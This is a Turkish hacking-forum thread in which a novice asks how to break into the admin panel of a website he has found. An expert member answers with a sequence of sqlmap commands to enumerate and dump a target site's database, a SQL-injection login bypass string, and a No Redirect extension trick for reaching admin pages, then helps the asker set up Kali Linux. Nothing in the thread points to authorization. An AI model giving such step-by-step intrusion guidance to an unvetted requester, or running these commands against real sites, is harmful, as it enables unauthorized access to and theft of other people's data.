Sızma Testleri Admin Paneline Girme

ben efsanaeyim · 14 Nis 2022

Selamlar. Bi sitenin admin panelini buldum. Bunun şifresini nasıl öğrenebilirim? Yani nasıl girebilirim sitenin paneline ? Panelin fotosunu bırakıyorum.

r65t0yv.PNG

a

www.hizliresim.com

Safak-Bey · 14 Nis 2022

Merhabalar,
Sitelerin admin panel bilgilerini öğrenmek için sitede eğer sql açığı varsa sitenin databasesini çekerek admin bilgilerine ulaşabilirsin ya da panelin kendisinde bulunan login bypass veya no redirect açıkları varsa username ve password bilgilerine ihtiyaç duymadan direk girebilirsin.

SQL Açığı ile;
Eğer sitede sql açığı varsa sqlmap aracı ile veya manuel olarak database çekebilirsiniz. SQLMAP aracının basit komutları aşağıdadır. Komutları sıra ile girin;
sqlmap -u "http ://hedefsite.com/index.php?id=1" --dbs --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch

LOGİN BYPASS Açığı ile;
Login bypass açığı ise panelde bulunan username ve password kısımlarına ''Or'='Or'' yazarak giriş yapmaktır. Diğer login bypass kodları içi tıklayın.

NO REDİRECT Açığı ile;
No Redirect bir eklentidir. Bu açığı kullanmak için firefox' un eski sürümü veya cyberfox' u indirerek no redirect eklentisini indirmeniz gerekmekte. Daha sonra eklentiyi açarak add kısmına tıklayın ve admin login sayfasının linkini yapıştırın. Ardından ok' a basın ve login sayfasına gelerek url' yi değiştirerek giriş yapmaya çalışın. örn: /dashboard.php, /manage.php, /index.php şeklinde deneyerek girmeye çalışın eğer açık var ise panele girersiniz.

İlgili açıkların konuları forumda mevcuttur, araştırarak daha iyi öğrenebilirsiniz. İyi forumlar...

ben efsanaeyim · 14 Nis 2022

Safak-Bey' Alıntı:
Merhabalar,
Sitelerin admin panel bilgilerini öğrenmek için sitede eğer sql açığı varsa sitenin databasesini çekerek admin bilgilerine ulaşabilirsin ya da panelin kendisinde bulunan login bypass veya no redirect açıkları varsa username ve password bilgilerine ihtiyaç duymadan direk girebilirsin.

SQL Açığı ile;
Eğer sitede sql açığı varsa sqlmap aracı ile veya manuel olarak database çekebilirsiniz. SQLMAP aracının basit komutları aşağıdadır. Komutları sıra ile girin;
sqlmap -u "http ://hedefsite.com/index.php?id=1" --dbs --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch

LOGİN BYPASS Açığı ile;
Login bypass açığı ise panelde bulunan username ve password kısımlarına ''Or'='Or'' yazarak giriş yapmaktır. Diğer login bypass kodları içi tıklayın.

NO REDİRECT Açığı ile;
No Redirect bir eklentidir. Bu açığı kullanmak için firefox' un eski sürümü veya cyberfox' u indirerek no redirect eklentisini indirmeniz gerekmekte. Daha sonra eklentiyi açarak add kısmına tıklayın ve admin login sayfasının linkini yapıştırın. Ardından ok' a basın ve login sayfasına gelerek url' yi değiştirerek giriş yapmaya çalışın. örn: /dashboard.php, /manage.php, /index.php şeklinde deneyerek girmeye çalışın eğer açık var ise panele girersiniz.

İlgili açıkların konuları forumda mevcuttur, araştırarak daha iyi öğrenebilirsiniz. İyi forumlar...

hocam bu kodları cmd ye mi yazıyoruz ?

Safak-Bey · 14 Nis 2022

ben efsanaeyim' Alıntı:
hocam bu kodları cmd ye mi yazıyoruz ?

Hayır dostum, VMWARE veya VirtualBox üzerinden Kali Linux kur. İnternete kali linux kurulum, kullanımı vb. yazarsan çıkar zaten. SQLMAP komutlarını kurduğun kalinin terminaline yazarak çalıştırırsın.

ben efsanaeyim · 14 Nis 2022

Safak-Bey' Alıntı:
Hayır dostum, VMWARE veya VirtualBox üzerinden Kali Linux kur. İnternete kali linux kurulum, kullanımı vb. yazarsan çıkar zaten. SQLMAP komutlarını kurduğun kalinin terminaline yazarak çalıştırırsın.

tamamdır teşekkürler

ben efsanaeyim · 14 Nis 2022

Safak-Bey' Alıntı:
Hayır dostum, VMWARE veya VirtualBox üzerinden Kali Linux kur. İnternete kali linux kurulum, kullanımı vb. yazarsan çıkar zaten. SQLMAP komutlarını kurduğun kalinin terminaline yazarak çalıştırırsın.

ubuntu ile linux aynı şey mi ?

MertcanKARASU · 14 Nis 2022

ben efsanaeyim' Alıntı:
ubuntu ile linux aynı şey mi ?

Ubuntu aslında Linux'un bir dağıtımıdır. Linux bir işletim sistemi çekirdeğidir.

Safak-Bey · 14 Nis 2022

MertcanKARASU' Alıntı:
Ubuntu aslında Linux'un bir dağıtımıdır. Linux bir işletim sistemi çekirdeğidir.

Tam yazıyordum

ben efsanaeyim · 14 Nis 2022

Safak-Bey' Alıntı:
Merhabalar,
Sitelerin admin panel bilgilerini öğrenmek için sitede eğer sql açığı varsa sitenin databasesini çekerek admin bilgilerine ulaşabilirsin ya da panelin kendisinde bulunan login bypass veya no redirect açıkları varsa username ve password bilgilerine ihtiyaç duymadan direk girebilirsin.

SQL Açığı ile;
Eğer sitede sql açığı varsa sqlmap aracı ile veya manuel olarak database çekebilirsiniz. SQLMAP aracının basit komutları aşağıdadır. Komutları sıra ile girin;
sqlmap -u "http ://hedefsite.com/index.php?id=1" --dbs --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u "http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch

LOGİN BYPASS Açığı ile;
Login bypass açığı ise panelde bulunan username ve password kısımlarına ''Or'='Or'' yazarak giriş yapmaktır. Diğer login bypass kodları içi tıklayın.

NO REDİRECT Açığı ile;
No Redirect bir eklentidir. Bu açığı kullanmak için firefox' un eski sürümü veya cyberfox' u indirerek no redirect eklentisini indirmeniz gerekmekte. Daha sonra eklentiyi açarak add kısmına tıklayın ve admin login sayfasının linkini yapıştırın. Ardından ok' a basın ve login sayfasına gelerek url' yi değiştirerek giriş yapmaya çalışın. örn: /dashboard.php, /manage.php, /index.php şeklinde deneyerek girmeye çalışın eğer açık var ise panele girersiniz.

İlgili açıkların konuları forumda mevcuttur, araştırarak daha iyi öğrenebilirsiniz. İyi forumlar...

no redirecti çalıştıramadım bu arada

Safak-Bey · 14 Nis 2022

ben efsanaeyim' Alıntı:
no redirecti çalıştıramadım bu arada

Windows kullanıyorsanız cyberfox indirin onun haricinde firefoxun 47. sürümünü indirin ardından no redirect eklentisini ekleyin...
Bu açık ile ilgili bir konu hazırlamıştım. İlgili konuya buraya tıklayarak gidebilirsiniz.

MertcanKARASU · 14 Nis 2022

Safak-Bey' Alıntı:
Tam yazıyordum

Biraz hızlı davranmışım kusura bakma kankam

Safak-Bey · 14 Nis 2022

MertcanKARASU' Alıntı:
Biraz hızlı davranmışım kusura bakma kankam

Estağfurullah ne demek, sadece benim forumum değil herkes cevap verebilir

ben efsanaeyim · 14 Nis 2022

Safak-Bey' Alıntı:
Windows kullanıyorsanız cyberfox indirin onun haricinde firefoxun 47. sürümünü indirin ardından no redirect eklentisini ekleyin...
Bu açık ile ilgili bir konu hazırlamıştım. İlgili konuya buraya tıklayarak gidebilirsiniz.

teşekkürler no redirect işe yaramadı.

ben efsanaeyim · 14 Nis 2022

Safak-Bey' Alıntı:
Windows kullanıyorsanız cyberfox indirin onun haricinde firefoxun 47. sürümünü indirin ardından no redirect eklentisini ekleyin...
Bu açık ile ilgili bir konu hazırlamıştım. İlgili konuya buraya tıklayarak gidebilirsiniz.

azureden kurdum linuxu ama rdp ile bağlanamıyorum.

Safak-Bey · 14 Nis 2022

ben efsanaeyim' Alıntı:
azureden kurdum linuxu ama rdp ile bağlanamıyorum.

VirutalBox veya VMware üzerinden kurun.

Sızma Testleri Admin Paneline Girme

ben efsanaeyim

Üye

r65t0yv.PNG

Safak-Bey

Uzman üye

ben efsanaeyim

Üye

Safak-Bey

Uzman üye

ben efsanaeyim

Üye

ben efsanaeyim

Üye

MertcanKARASU

Üye

Safak-Bey

Uzman üye

ben efsanaeyim

Üye

Safak-Bey

Uzman üye

MertcanKARASU

Üye

Safak-Bey

Uzman üye

ben efsanaeyim

Üye

ben efsanaeyim

Üye

Safak-Bey

Uzman üye

Sosyal medya sayfalarımız